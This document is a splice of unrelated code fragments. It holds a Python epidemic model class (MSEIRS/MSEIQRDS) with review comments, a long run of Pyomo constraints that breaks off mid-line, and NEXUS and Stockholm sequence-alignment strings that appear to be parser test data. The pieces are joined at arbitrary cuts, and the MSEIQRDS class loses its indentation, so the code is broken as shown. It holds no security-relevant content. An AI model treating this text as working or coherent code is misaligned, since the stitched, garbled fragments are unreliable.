               f"(lam={self.lam}, sigma={round(self.sigma,3)}, b={self.b}, k={self.k}, a={round(self.a,3)}, mu={self.mu}, l={round(self.l,3)})"

    def rhs(self, t, y):
        """
        Define MSEIRS model's differential equations
        (was mislabeled 'MSEIR' - copy/paste docstring)
        """
        m_ = self.lam - self.sigma * y[0] - self.mu * y[0]
        s_ = self.sigma * y[0] + self.l * y[4] - self.b * y[1] * y[3] - self.mu * y[1]
        e_ = self.b * y[1] * y[3] - (self.mu + self.a) * y[2]
        i_ = self.a * y[2] - (self.mu + self.k) * y[3]
        r_ = self.k * y[3] - (self.mu + self.l) * y[4]
        return np.array([m_, s_, e_, i_, r_])
class MSEIQRDS(covid):
def __init__(self, **kwargs):
    """
    init MSEIQRDS model parameters,
    [maternally_derived_immunity-susceptible-exposed-infectious-quarantine-recovered-decreased]
    q percent of the infectious become quarantined and do not spread the virus,
    so quarantine is not a separate compartment in the ODE model:
    dm / dt = lam - sigma * m - mu * m
    ds / dt = sigma * m + re * r - mu * s - b * s * (1-q)i
    de / dt = b * s * (1-q)i - (mu + a) * e
    di / dt = a * e - (k + mu) * i - d * log(i/1-i)
    dd / dt = d * log(i/1-i)
    dr / dt = k * i - (mu + re) * r
    Parameter
        lam - birth rate of total population
        sigma - the rate of changing from maternally_derived_immunity to susceptible
        b - number of interactions per individual per day
        k - fraction of infectious which recovers each day (0 < k < 1)
        q - quarantine rate
        a - 1/a is the mean incubation period of exponential distribution
        mu - population decrease rate
        dr - death/decrease rate
        re - re-susceptible rate
    Optional Parameter
        M, S, E, I, R, D - absolute compartment populations; N - total population
    """
    # NOTE(review): unlike the sibling models this __init__ does not call
    # super().__init__ - confirm the covid base init is intentionally skipped.
    self.parameters = {}
    self.parameters['lam'] = kwargs.get('lam', 3e-5)
    self.parameters['sigma'] = kwargs.get('sigma', 1/720)
    self.parameters['b'] = kwargs.get('b', 3)
    self.parameters['k'] = kwargs.get('k', 0.1)
    self.parameters['a'] = kwargs.get('a', 1/14)
    self.parameters['mu'] = kwargs.get('mu', 3e-5)
    self.parameters['q'] = kwargs.get('q', 0)
    self.parameters['dr'] = kwargs.get('dr', 0.3)
    self.parameters['re'] = kwargs.get('re', 1/360)
    self.S = kwargs.get('S', 999_995)
    self.I = kwargs.get('I', 5)
    self.R = kwargs.get('R', 0)
    self.E = kwargs.get('E', 0)
    self.M = kwargs.get('M', 0)
    self.D = kwargs.get('D', 0)
    self.N = kwargs.get('N', self.S + self.I + self.R + self.E + self.M + self.D)
    assert self.S + self.I + self.R + self.E + self.M + self.D == self.N, 'M+S+E+I+R+D should equal to N'
    # normalised fractions form the ODE state
    self.s = kwargs.get('s', self.S / self.N)
    self.i = kwargs.get('i', self.I / self.N)
    self.r = kwargs.get('r', self.R / self.N)
    self.e = kwargs.get('e', self.E / self.N)
    self.m = kwargs.get('m', self.M / self.N)
    self.d = kwargs.get('d', self.D / self.N)
    self.sol = None
    # state vector order: (m, s, e, i, r, d)
    self.y0 = np.array([self.m, self.s, self.e, self.i, self.r, self.d])
    # BUG FIX: labels/colors must follow y0's order (m, s, e, i, r, d);
    # 'Death' and 'Removed' were swapped relative to r and d
    # (sibling models align labels positionally with y0).
    self.labels = ['MDI', 'Susceptible', 'Exposed', 'Infectious', 'Removed', 'Death']
    self.colors = ['yellow', 'green', 'grey', 'red', 'blue', 'black']
def __repr__(self):
| |
= Constraint(expr= - m.b213 + m.x1074 <= 0)
m.c1835 = Constraint(expr= - m.b214 + m.x1075 <= 0)
m.c1836 = Constraint(expr= - m.b215 + m.x1076 <= 0)
m.c1837 = Constraint(expr= - m.b216 + m.x1077 <= 0)
m.c1838 = Constraint(expr= - m.b217 + m.x1078 <= 0)
m.c1839 = Constraint(expr= - m.b218 + m.x1079 <= 0)
m.c1840 = Constraint(expr= - m.b219 + m.x1080 <= 0)
m.c1841 = Constraint(expr= - m.b220 + m.x1081 <= 0)
m.c1842 = Constraint(expr= - m.b221 + m.x1082 <= 0)
m.c1843 = Constraint(expr= - m.b222 + m.x1083 <= 0)
m.c1844 = Constraint(expr= - m.b223 + m.x1084 <= 0)
m.c1845 = Constraint(expr= - m.b224 + m.x1085 <= 0)
m.c1846 = Constraint(expr= - m.b225 + m.x1086 <= 0)
m.c1847 = Constraint(expr= - m.b226 + m.x1087 <= 0)
m.c1848 = Constraint(expr= - m.b227 + m.x1088 <= 0)
m.c1849 = Constraint(expr= - m.b228 + m.x1089 <= 0)
m.c1850 = Constraint(expr= - m.b229 + m.x1090 <= 0)
m.c1851 = Constraint(expr= - m.b230 + m.x1091 <= 0)
m.c1852 = Constraint(expr= - m.b231 + m.x1092 <= 0)
m.c1853 = Constraint(expr= - m.b232 + m.x1093 <= 0)
m.c1854 = Constraint(expr= - m.b233 + m.x1094 <= 0)
m.c1855 = Constraint(expr= - m.b234 + m.x1095 <= 0)
m.c1856 = Constraint(expr= - m.b235 + m.x1096 <= 0)
m.c1857 = Constraint(expr= - m.b236 + m.x1097 <= 0)
m.c1858 = Constraint(expr= - m.b237 + m.x1098 <= 0)
m.c1859 = Constraint(expr= - m.b238 + m.x1099 <= 0)
m.c1860 = Constraint(expr= - m.b239 + m.x1100 <= 0)
m.c1861 = Constraint(expr= - m.b240 + m.x1101 <= 0)
m.c1862 = Constraint(expr= - m.b241 + m.x1102 <= 0)
m.c1863 = Constraint(expr= - m.b242 + m.x1103 <= 0)
m.c1864 = Constraint(expr= - m.b243 + m.x1104 <= 0)
m.c1865 = Constraint(expr= - m.b244 + m.x1105 <= 0)
m.c1866 = Constraint(expr= - m.b245 + m.x1106 <= 0)
m.c1867 = Constraint(expr= - m.b246 + m.x1107 <= 0)
m.c1868 = Constraint(expr= - m.b247 + m.x1108 <= 0)
m.c1869 = Constraint(expr= - m.b248 + m.x1109 <= 0)
m.c1870 = Constraint(expr= - m.b249 + m.x1110 <= 0)
m.c1871 = Constraint(expr= - m.b250 + m.x1111 <= 0)
m.c1872 = Constraint(expr= - m.b251 + m.x1112 <= 0)
m.c1873 = Constraint(expr= - m.b252 + m.x1113 <= 0)
m.c1874 = Constraint(expr= - m.b253 + m.x1114 <= 0)
m.c1875 = Constraint(expr= - m.b254 + m.x1115 <= 0)
m.c1876 = Constraint(expr= - m.b255 + m.x1116 <= 0)
m.c1877 = Constraint(expr= - m.b256 + m.x1117 <= 0)
m.c1878 = Constraint(expr= - m.b257 + m.x1118 <= 0)
m.c1879 = Constraint(expr= - m.b258 + m.x1119 <= 0)
m.c1880 = Constraint(expr= - m.b259 + m.x1120 <= 0)
m.c1881 = Constraint(expr= - m.b260 + m.x1121 <= 0)
m.c1882 = Constraint(expr= - m.b261 + m.x1122 <= 0)
m.c1883 = Constraint(expr= - m.b262 + m.x1123 <= 0)
m.c1884 = Constraint(expr= - m.b263 + m.x1124 <= 0)
m.c1885 = Constraint(expr= - m.b264 + m.x1125 <= 0)
m.c1886 = Constraint(expr= - m.b265 + m.x1126 <= 0)
m.c1887 = Constraint(expr= - m.b266 + m.x1127 <= 0)
m.c1888 = Constraint(expr= - m.b267 + m.x1128 <= 0)
m.c1889 = Constraint(expr= - m.b268 + m.x1129 <= 0)
m.c1890 = Constraint(expr= - m.b269 + m.x1130 <= 0)
m.c1891 = Constraint(expr= - m.b270 + m.x1131 <= 0)
m.c1892 = Constraint(expr= - m.b271 + m.x1132 <= 0)
m.c1893 = Constraint(expr= - m.b272 + m.x1133 <= 0)
m.c1894 = Constraint(expr= - m.b273 + m.x1134 <= 0)
m.c1895 = Constraint(expr= - m.b274 + m.x1135 <= 0)
m.c1896 = Constraint(expr= - m.b275 + m.x1136 <= 0)
m.c1897 = Constraint(expr= - m.b276 + m.x1137 <= 0)
m.c1898 = Constraint(expr= - m.b277 + m.x1138 <= 0)
m.c1899 = Constraint(expr= - m.b278 + m.x1139 <= 0)
m.c1900 = Constraint(expr= - m.b279 + m.x1140 <= 0)
m.c1901 = Constraint(expr= - m.b280 + m.x1141 <= 0)
m.c1902 = Constraint(expr= - m.b281 + m.x1142 <= 0)
m.c1903 = Constraint(expr= - m.b282 + m.x1143 <= 0)
m.c1904 = Constraint(expr= - m.b283 + m.x1144 <= 0)
m.c1905 = Constraint(expr= - m.b284 + m.x1145 <= 0)
m.c1906 = Constraint(expr= - m.b285 + m.x1146 <= 0)
m.c1907 = Constraint(expr= - m.b286 + m.x1147 <= 0)
m.c1908 = Constraint(expr= - m.b287 + m.x1148 <= 0)
m.c1909 = Constraint(expr= - m.b288 + m.x1149 <= 0)
m.c1910 = Constraint(expr= - m.b289 + m.x1150 <= 0)
m.c1911 = Constraint(expr= - m.b290 + m.x1151 <= 0)
m.c1912 = Constraint(expr= - m.b291 + m.x1152 <= 0)
m.c1913 = Constraint(expr= - m.b292 + m.x1153 <= 0)
m.c1914 = Constraint(expr= - m.b293 + m.x1154 <= 0)
m.c1915 = Constraint(expr= - m.b294 + m.x1155 <= 0)
m.c1916 = Constraint(expr= - m.b295 + m.x1156 <= 0)
m.c1917 = Constraint(expr= - m.b296 + m.x1157 <= 0)
m.c1918 = Constraint(expr= - m.b297 + m.x1158 <= 0)
m.c1919 = Constraint(expr= - m.b298 + m.x1159 <= 0)
m.c1920 = Constraint(expr= - m.b299 + m.x1160 <= 0)
m.c1921 = Constraint(expr= - m.b300 + m.x1161 <= 0)
m.c1922 = Constraint(expr= - m.b301 + m.x1162 <= 0)
m.c1923 = Constraint(expr= - m.b302 + m.x1163 <= 0)
m.c1924 = Constraint(expr= - m.b303 + m.x1164 <= 0)
m.c1925 = Constraint(expr= - m.b304 + m.x1165 <= 0)
m.c1926 = Constraint(expr= - m.b305 + m.x1166 <= 0)
m.c1927 = Constraint(expr= - m.b306 + m.x1167 <= 0)
m.c1928 = Constraint(expr= - m.b307 + m.x1168 <= 0)
m.c1929 = Constraint(expr= - m.b308 + m.x1169 <= 0)
m.c1930 = Constraint(expr= - m.b309 + m.x1170 <= 0)
m.c1931 = Constraint(expr= - m.b310 + m.x1171 <= 0)
m.c1932 = Constraint(expr= - m.b311 + m.x1172 <= 0)
m.c1933 = Constraint(expr= - m.b312 + m.x1173 <= 0)
m.c1934 = Constraint(expr= - m.b313 + m.x1174 <= 0)
m.c1935 = Constraint(expr= - m.b314 + m.x1175 <= 0)
m.c1936 = Constraint(expr= - m.b315 + m.x1176 <= 0)
m.c1937 = Constraint(expr= - m.b316 + m.x1177 <= 0)
m.c1938 = Constraint(expr= - m.b317 + m.x1178 <= 0)
m.c1939 = Constraint(expr= - m.b318 + m.x1179 <= 0)
m.c1940 = Constraint(expr= - m.b319 + m.x1180 <= 0)
m.c1941 = Constraint(expr= - m.b320 + m.x1181 <= 0)
m.c1942 = Constraint(expr= - m.b321 + m.x1182 <= 0)
m.c1943 = Constraint(expr= - m.b322 + m.x1183 <= 0)
m.c1944 = Constraint(expr= - m.b323 + m.x1184 <= 0)
m.c1945 = Constraint(expr= - m.b324 + m.x1185 <= 0)
m.c1946 = Constraint(expr= - m.b325 + m.x1186 <= 0)
m.c1947 = Constraint(expr= - m.b326 + m.x1187 <= 0)
m.c1948 = Constraint(expr= - m.b327 + m.x1188 <= 0)
m.c1949 = Constraint(expr= - m.b328 + m.x1189 <= 0)
m.c1950 = Constraint(expr= - m.b329 + m.x1190 <= 0)
m.c1951 = Constraint(expr= - m.b330 + m.x1191 <= 0)
m.c1952 = Constraint(expr= - m.b331 + m.x1192 <= 0)
m.c1953 = Constraint(expr= - m.b332 + m.x1193 <= 0)
m.c1954 = Constraint(expr= - m.b333 + m.x1194 <= 0)
m.c1955 = Constraint(expr= - m.b334 + m.x1195 <= 0)
m.c1956 = Constraint(expr= - m.b335 + m.x1196 <= 0)
m.c1957 = Constraint(expr= - m.b336 + m.x1197 <= 0)
m.c1958 = Constraint(expr= - m.b337 + m.x1198 <= 0)
m.c1959 = Constraint(expr= - m.b338 + m.x1199 <= 0)
m.c1960 = Constraint(expr= - m.b339 + m.x1200 <= 0)
m.c1961 = Constraint(expr= - m.b340 + m.x1201 <= 0)
m.c1962 = Constraint(expr= - m.b341 + m.x1202 <= 0)
m.c1963 = Constraint(expr= - m.b342 + m.x1203 <= 0)
m.c1964 = Constraint(expr= - m.b343 + m.x1204 <= 0)
m.c1965 = Constraint(expr= - m.b344 + m.x1205 <= 0)
m.c1966 = Constraint(expr= - m.b345 + m.x1206 <= 0)
m.c1967 = Constraint(expr= - m.b346 + m.x1207 <= 0)
m.c1968 = Constraint(expr= - m.b347 + m.x1208 <= 0)
m.c1969 = Constraint(expr= - m.b348 + m.x1209 <= 0)
m.c1970 = Constraint(expr= - m.b349 + m.x1210 <= 0)
m.c1971 = Constraint(expr= - m.b350 + m.x1211 <= 0)
m.c1972 = Constraint(expr= - m.b351 + m.x1212 <= 0)
m.c1973 = Constraint(expr= - m.b352 + m.x1213 <= 0)
m.c1974 = Constraint(expr= - m.b353 + m.x1214 <= 0)
m.c1975 = Constraint(expr= - m.b354 + m.x1215 <= 0)
m.c1976 = Constraint(expr= - m.b355 + m.x1216 <= 0)
m.c1977 = Constraint(expr= - m.b356 + m.x1217 <= 0)
m.c1978 = Constraint(expr= - m.b357 + m.x1218 <= 0)
m.c1979 = Constraint(expr= - m.b358 + m.x1219 <= 0)
m.c1980 = Constraint(expr= - m.b359 + m.x1220 <= 0)
m.c1981 = Constraint(expr= - m.b360 + m.x1221 <= 0)
m.c1982 = Constraint(expr= - m.b361 + m.x1222 <= 0)
m.c1983 = Constraint(expr= - m.b362 + m.x1223 <= 0)
m.c1984 = Constraint(expr= - m.b363 + m.x1224 <= 0)
m.c1985 = Constraint(expr= - m.b364 + m.x1225 <= 0)
m.c1986 = Constraint(expr= - m.b365 + m.x1226 <= 0)
m.c1987 = Constraint(expr= - m.b366 + m.x1227 <= 0)
m.c1988 = Constraint(expr= - m.b367 + m.x1228 <= 0)
m.c1989 = Constraint(expr= - m.b368 + m.x1229 <= 0)
m.c1990 = Constraint(expr= - m.b369 + m.x1230 <= 0)
m.c1991 = Constraint(expr= - m.b370 + m.x1231 <= 0)
m.c1992 = Constraint(expr= - m.b371 + m.x1232 <= 0)
m.c1993 = Constraint(expr= - m.b372 + m.x1233 <= 0)
m.c1994 | |
CTACGCATCCTGTACCTTATAGACGAAATTAACGACCCTCACCTGACAATTAAAGCAATA
Chicken CTCCAAATCCTCTACATAATAGACGAAATCGACGAACCTGATCTCACCCTAAAAGCCATC
Human CTACGCATCCTTTACATAACAGACGAGGTCAACGATCCCTCCCTTACCATCAAATCAATT
Loach CTACGAATTCTATATCTTATAGACGAGATTAATGACCCCCACCTAACAATTAAGGCCATG
Mouse CTACGCATTCTATATATAATAGACGAAATCAACAACCCCGTATTAACCGTTAAAACCATA
Rat CTACGAATTCTATACATAATAGACGAGATTAATAACCCAGTTCTAACAGTAAAAACTATA
Seal TTACGAATCCTCTACATAATGGACGAGATCAATAACCCTTCCTTGACCGTAAAAACTATA
Whale TTACGGATCCTTTACATAATAGACGAAGTCAATAACCCCTCCCTCACTGTAAAAACAATA
Frog CTTCGTATCCTATATTTAATAGATGAAGTTAATGATCCACACTTAACAATTAAAGCAATC
Cow GGACATCAGTGATACTGAAGCTATGAGTATACAGATTATGAGGACTTAAGCTTCGACTCC
Carp GGACACCAATGATACTGAAGTTACGAGTATACAGACTATGAAAATCTAGGATTCGACTCC
Chicken GGACACCAATGATACTGAACCTATGAATACACAGACTTCAAGGACCTCTCATTTGACTCC
Human GGCCACCAATGGTACTGAACCTACGAGTACACCGACTACGGCGGACTAATCTTCAACTCC
Loach GGGCACCAATGATACTGAAGCTACGAGTATACTGATTATGAAAACTTAAGTTTTGACTCC
Mouse GGGCACCAATGATACTGAAGCTACGAATATACTGACTATGAAGACCTATGCTTTGATTCA
Rat GGACACCAATGATACTGAAGCTATGAATATACTGACTATGAAGACCTATGCTTTGACTCC
Seal GGACATCAGTGATACTGAAGCTATGAGTACACAGACTACGAAGACCTGAACTTTGACTCA
Whale GGTCACCAATGATATTGAAGCTATGAGTATACCGACTACGAAGACCTAAGCTTCGACTCC
Frog GGCCACCAATGATACTGAAGCTACGAATATACTAACTATGAGGATCTCTCATTTGACTCT
Cow TACATAATTCCAACATCAGAATTAAAGCCAGGGGAGCTACGACTATTAGAAGTCGATAAT
Carp TATATAGTACCAACCCAAGACCTTGCCCCCGGACAATTCCGACTTCTGGAAACAGACCAC
Chicken TACATAACCCCAACAACAGACCTCCCCCTAGGCCACTTCCGCCTACTAGAAGTCGACCAT
Human TACATACTTCCCCCATTATTCCTAGAACCAGGCGACCTGCGACTCCTTGACGTTGACAAT
Loach TACATAATCCCCACCCAGGACCTAACCCCTGGACAATTCCGGCTACTAGAGACAGACCAC
Mouse TATATAATCCCAACAAACGACCTAAAACCTGGTGAACTACGACTGCTAGAAGTTGATAAC
Rat TACATAATCCCAACCAATGACCTAAAACCAGGTGAACTTCGTCTATTAGAAGTTGATAAT
Seal TATATGATCCCCACACAAGAACTAAAGCCCGGAGAACTACGACTGCTAGAAGTAGACAAT
Whale TATATAATCCCAACATCAGACCTAAAGCCAGGAGAACTACGATTATTAGAAGTAGATAAC
Frog TATATAATTCCAACTAATGACCTTACCCCTGGACAATTCCGGCTGCTAGAAGTTGATAAT
Cow CGAGTTGTACTACCAATAGAAATAACAATCCGAATGTTAGTCTCCTCTGAAGACGTATTA
Carp CGAATAGTTGTTCCAATAGAATCCCCAGTCCGTGTCCTAGTATCTGCTGAAGACGTGCTA
Chicken CGCATTGTAATCCCCATAGAATCCCCCATTCGAGTAATCATCACCGCTGATGACGTCCTC
Human CGAGTAGTACTCCCGATTGAAGCCCCCATTCGTATAATAATTACATCACAAGACGTCTTG
Loach CGAATGGTTGTTCCCATAGAATCCCCTATTCGCATTCTTGTTTCCGCCGAAGATGTACTA
Mouse CGAGTCGTTCTGCCAATAGAACTTCCAATCCGTATATTAATTTCATCTGAAGACGTCCTC
Rat CGGGTAGTCTTACCAATAGAACTTCCAATTCGTATACTAATCTCATCCGAAGACGTCCTG
Seal CGAGTAGTCCTCCCAATAGAAATAACAATCCGCATACTAATCTCATCAGAAGATGTACTC
Whale CGAGTTGTCTTACCTATAGAAATAACAATCCGAATATTAGTCTCATCAGAAGACGTACTC
Frog CGAATAGTAGTCCCAATAGAATCTCCAACCCGACTTTTAGTTACAGCCGAAGACGTCCTC
Cow CACTCATGAGCTGTGCCCTCTCTAGGACTAAAAACAGACGCAATCCCAGGCCGTCTAAAC
Carp CATTCTTGAGCTGTTCCATCCCTTGGCGTAAAAATGGACGCAGTCCCAGGACGACTAAAT
Chicken CACTCATGAGCCGTACCCGCCCTCGGGGTAAAAACAGACGCAATCCCTGGACGACTAAAT
Human CACTCATGAGCTGTCCCCACATTAGGCTTAAAAACAGATGCAATTCCCGGACGTCTAAAC
Loach CACTCCTGGGCCCTTCCAGCCATGGGGGTAAAGATAGACGCGGTCCCAGGACGCCTTAAC
Mouse CACTCATGAGCAGTCCCCTCCCTAGGACTTAAAACTGATGCCATCCCAGGCCGACTAAAT
Rat CACTCATGAGCCATCCCTTCACTAGGGTTAAAAACCGACGCAATCCCCGGCCGCCTAAAC
Seal CACTCATGAGCCGTACCGTCCCTAGGACTAAAAACTGATGCTATCCCAGGACGACTAAAC
Whale CACTCATGGGCCGTACCCTCCTTGGGCCTAAAAACAGATGCAATCCCAGGACGCCTAAAC
Frog CACTCGTGAGCTGTACCCTCCTTGGGTGTCAAAACAGATGCAATCCCAGGACGACTTCAT
Cow CAAACAACCCTTATATCGTCCCGTCCAGGCTTATATTACGGTCAATGCTCAGAAATTTGC
Carp CAAGCCGCCTTTATTGCCTCACGCCCAGGGGTCTTTTACGGACAATGCTCTGAAATTTGT
Chicken CAAACCTCCTTCATCACCACTCGACCAGGAGTGTTTTACGGACAATGCTCAGAAATCTGC
Human CAAACCACTTTCACCGCTACACGACCGGGGGTATACTACGGTCAATGCTCTGAAATCTGT
Loach CAAACCGCCTTTATTGCCTCCCGCCCCGGGGTATTCTATGGGCAATGCTCAGAAATCTGT
Mouse CAAGCAACAGTAACATCAAACCGACCAGGGTTATTCTATGGCCAATGCTCTGAAATTTGT
Rat CAAGCTACAGTCACATCAAACCGACCAGGTCTATTCTATGGCCAATGCTCTGAAATTTGC
Seal CAAACAACCCTAATAACCATACGACCAGGACTGTACTACGGTCAATGCTCAGAAATCTGT
Whale CAAACAACCTTAATATCAACACGACCAGGCCTATTTTATGGACAATGCTCAGAGATCTGC
Frog CAAACATCATTTATTGCTACTCGTCCGGGAGTATTTTACGGACAATGTTCAGAAATTTGC
Cow GGGTCAAACCACAGTTTCATACCCATTGTCCTTGAGTTAGTCCCACTAAAGTACTTTGAA
Carp GGAGCTAATCACAGCTTTATACCAATTGTAGTTGAAGCAGTACCTCTCGAACACTTCGAA
Chicken GGAGCTAACCACAGCTACATACCCATTGTAGTAGAGTCTACCCCCCTAAAACACTTTGAA
Human GGAGCAAACCACAGTTTCATGCCCATCGTCCTAGAATTAATTCCCCTAAAAATCTTTGAA
Loach GGAGCAAACCACAGCTTTATACCCATCGTAGTAGAAGCGGTCCCACTATCTCACTTCGAA
Mouse GGATCTAACCATAGCTTTATGCCCATTGTCCTAGAAATGGTTCCACTAAAATATTTCGAA
Rat GGCTCAAATCACAGCTTCATACCCATTGTACTAGAAATAGTGCCTCTAAAATATTTCGAA
Seal GGTTCAAACCACAGCTTCATACCTATTGTCCTCGAATTGGTCCCACTATCCCACTTCGAG
Whale GGCTCAAACCACAGTTTCATACCAATTGTCCTAGAACTAGTACCCCTAGAAGTCTTTGAA
Frog GGAGCAAACCACAGCTTTATACCAATTGTAGTTGAAGCAGTACCGCTAACCGACTTTGAA
Cow AAATGATCTGCGTCAATATTA---------------------TAA
Carp AACTGATCCTCATTAATACTAGAAGACGCCTCGCTAGGAAGCTAA
Chicken GCCTGATCCTCACTA------------------CTGTCATCTTAA
Human ATA---------------------GGGCCCGTATTTACCCTATAG
Loach AACTGGTCCACCCTTATACTAAAAGACGCCTCACTAGGAAGCTAA
Mouse AACTGATCTGCTTCAATAATT---------------------TAA
Rat AACTGATCAGCTTCTATAATT---------------------TAA
Seal AAATGATCTACCTCAATGCTT---------------------TAA
Whale AAATGATCTGTATCAATACTA---------------------TAA
Frog AACTGATCTTCATCAATACTA---GAAGCATCACTA------AGA
;
End;
"""
# This example uses amino acids, from here:
# http://www.molecularevolution.org/resources/fileformats/
nxs_example3 = \
"""#NEXUS
Begin data;
Dimensions ntax=10 nchar=234;
Format datatype=protein gap=- interleave;
Matrix
Cow MAYPMQLGFQDATSPIMEELLHFHDHTLMIVFLISSLVLYIISLMLTTKLTHTSTMDAQE
Carp MAHPTQLGFKDAAMPVMEELLHFHDHALMIVLLISTLVLYIITAMVSTKLTNKYILDSQE
Chicken MANHSQLGFQDASSPIMEELVEFHDHALMVALAICSLVLYLLTLMLMEKLS-SNTVDAQE
Human MAHAAQVGLQDATSPIMEELITFHDHALMIIFLICFLVLYALFLTLTTKLTNTNISDAQE
Loach MAHPTQLGFQDAASPVMEELLHFHDHALMIVFLISALVLYVIITTVSTKLTNMYILDSQE
Mouse MAYPFQLGLQDATSPIMEELMNFHDHTLMIVFLISSLVLYIISLMLTTKLTHTSTMDAQE
Rat MAYPFQLGLQDATSPIMEELTNFHDHTLMIVFLISSLVLYIISLMLTTKLTHTSTMDAQE
Seal MAYPLQMGLQDATSPIMEELLHFHDHTLMIVFLISSLVLYIISLMLTTKLTHTSTMDAQE
Whale MAYPFQLGFQDAASPIMEELLHFHDHTLMIVFLISSLVLYIITLMLTTKLTHTSTMDAQE
Frog MAHPSQLGFQDAASPIMEELLHFHDHTLMAVFLISTLVLYIITIMMTTKLTNTNLMDAQE
Cow VETIWTILPAIILILIALPSLRILYMMDEINNPSLTVKTMGHQWYWSYEYTDYEDLSFDS
Carp IEIVWTILPAVILVLIALPSLRILYLMDEINDPHLTIKAMGHQWYWSYEYTDYENLGFDS
Chicken VELIWTILPAIVLVLLALPSLQILYMMDEIDEPDLTLKAIGHQWYWTYEYTDFKDLSFDS
Human METVWTILPAIILVLIALPSLRILYMTDEVNDPSLTIKSIGHQWYWTYEYTDYGGLIFNS
Loach IEIVWTVLPALILILIALPSLRILYLMDEINDPHLTIKAMGHQWYWSYEYTDYENLSFDS
Mouse VETIWTILPAVILIMIALPSLRILYMMDEINNPVLTVKTMGHQWYWSYEYTDYEDLCFDS
Rat VETIWTILPAVILILIALPSLRILYMMDEINNPVLTVKTMGHQWYWSYEYTDYEDLCFDS
Seal VETVWTILPAIILILIALPSLRILYMMDEINNPSLTVKTMGHQWYWSYEYTDYEDLNFDS
Whale VETVWTILPAIILILIALPSLRILYMMDEVNNPSLTVKTMGHQWYWSYEYTDYEDLSFDS
Frog IEMVWTIMPAISLIMIALPSLRILYLMDEVNDPHLTIKAIGHQWYWSYEYTNYEDLSFDS
Cow YMIPTSELKPGELRLLEVDNRVVLPMEMTIRMLVSSEDVLHSWAVPSLGLKTDAIPGRLN
Carp YMVPTQDLAPGQFRLLETDHRMVVPMESPVRVLVSAEDVLHSWAVPSLGVKMDAVPGRLN
Chicken YMTPTTDLPLGHFRLLEVDHRIVIPMESPIRVIITADDVLHSWAVPALGVKTDAIPGRLN
Human YMLPPLFLEPGDLRLLDVDNRVVLPIEAPIRMMITSQDVLHSWAVPTLGLKTDAIPGRLN
Loach YMIPTQDLTPGQFRLLETDHRMVVPMESPIRILVSAEDVLHSWALPAMGVKMDAVPGRLN
Mouse YMIPTNDLKPGELRLLEVDNRVVLPMELPIRMLISSEDVLHSWAVPSLGLKTDAIPGRLN
Rat YMIPTNDLKPGELRLLEVDNRVVLPMELPIRMLISSEDVLHSWAIPSLGLKTDAIPGRLN
Seal YMIPTQELKPGELRLLEVDNRVVLPMEMTIRMLISSEDVLHSWAVPSLGLKTDAIPGRLN
Whale YMIPTSDLKPGELRLLEVDNRVVLPMEMTIRMLVSSEDVLHSWAVPSLGLKTDAIPGRLN
Frog YMIPTNDLTPGQFRLLEVDNRMVVPMESPTRLLVTAEDVLHSWAVPSLGVKTDAIPGRLH
Cow QTTLMSSRPGLYYGQCSEICGSNHSFMPIVLELVPLKYFEKWSASML-------
Carp QAAFIASRPGVFYGQCSEICGANHSFMPIVVEAVPLEHFENWSSLMLEDASLGS
Chicken QTSFITTRPGVFYGQCSEICGANHSYMPIVVESTPLKHFEAWSSL------LSS
Human QTTFTATRPGVYYGQCSEICGANHSFMPIVLELIPLKIFEM-------GPVFTL
Loach QTAFIASRPGVFYGQCSEICGANHSFMPIVVEAVPLSHFENWSTLMLKDASLGS
Mouse QATVTSNRPGLFYGQCSEICGSNHSFMPIVLEMVPLKYFENWSASMI-------
Rat QATVTSNRPGLFYGQCSEICGSNHSFMPIVLEMVPLKYFENWSASMI-------
Seal QTTLMTMRPGLYYGQCSEICGSNHSFMPIVLELVPLSHFEKWSTSML-------
Whale QTTLMSTRPGLFYGQCSEICGSNHSFMPIVLELVPLEVFEKWSVSML-------
Frog QTSFIATRPGVFYGQCSEICGANHSFMPIVVEAVPLTDFENWSSSML-EASL--
;
End;
"""
# This example with its slightly odd (partial) annotation is from here:
# http://www.cgb.ki.se/cgb/groups/sonnhammer/Stockholm.html
sth_example = \
"""# STOCKHOLM 1.0
#=GF ID CBS
#=GF AC PF00571
#=GF DE CBS domain
#=GF AU Bateman A
#=GF CC CBS domains are small intracellular modules mostly found
#=GF CC in 2 or four copies within a protein.
#=GF SQ 67
#=GS O31698/18-71 AC O31698
#=GS O83071/192-246 AC O83071
#=GS O83071/259-312 AC O83071
#=GS O31698/88-139 AC O31698
#=GS O31698/88-139 OS Bacillus subtilis
O83071/192-246 MTCRAQLIAVPRASSLAE..AIACAQKM....RVSRVPVYERS
#=GR O83071/192-246 SA 999887756453524252..55152525....36463774777
O83071/259-312 MQHVSAPVFVFECTRLAY..VQHKLRAH....SRAVAIVLDEY
#=GR O83071/259-312 SS CCCCCHHHHHHHHHHHHH..EEEEEEEE....EEEEEEEEEEE
O31698/18-71 MIEADKVAHVQVGNNLEH..ALLVLTKT....GYTAIPVLDPS
#=GR O31698/18-71 SS CCCHHHHHHHHHHHHHHH..EEEEEEEE....EEEEEEEEHHH
O31698/88-139 EVMLTDIPRLHINDPIMK..GFGMVINN......GFVCVENDE
#=GR O31698/88-139 SS CCCCCCCHHHHHHHHHHH..HEEEEEEE....EEEEEEEEEEH
#=GC SS_cons CCCCCHHHHHHHHHHHHH..EEEEEEEE....EEEEEEEEEEH
O31699/88-139 EVMLTDIPRLHINDPIMK..GFGMVINN......GFVCVENDE
#=GR O31699/88-139 AS ________________*__________________________
#=GR_O31699/88-139_IN ____________1______________2__________0____
//
"""
# Interlaced example from BioPerl documentation. Also note the blank line.
# http://www.bioperl.org/wiki/Stockholm_multiple_alignment_format
sth_example2 = \
"""# STOCKHOLM 1.0
#=GC SS_cons .................<<<<<<<<...<<<<<<<........>>>>>>>..
AP001509.1 UUAAUCGAGCUCAACACUCUUCGUAUAUCCUC-UCAAUAUGG-GAUGAGGGU
#=GR AP001509.1 SS -----------------<<<<<<<<---..<<-<<-------->>->>..--
AE007476.1 AAAAUUGAAUAUCGUUUUACUUGUUUAU-GUCGUGAAU-UGG-CACGA-CGU
#=GR AE007476.1 SS -----------------<<<<<<<<-----<<.<<-------->>.>>----
#=GC SS_cons ......<<<<<<<.......>>>>>>>..>>>>>>>>...............
AP001509.1 CUCUAC-AGGUA-CCGUAAA-UACCUAGCUACGAAAAGAAUGCAGUUAAUGU
#=GR AP001509.1 SS -------<<<<<--------->>>>>--->>>>>>>>---------------
AE007476.1 UUCUACAAGGUG-CCGG-AA-CACCUAACAAUAAGUAAGUCAGCAGUGAGAU
#=GR AE007476.1 SS ------.<<<<<--------->>>>>.-->>>>>>>>---------------
//"""
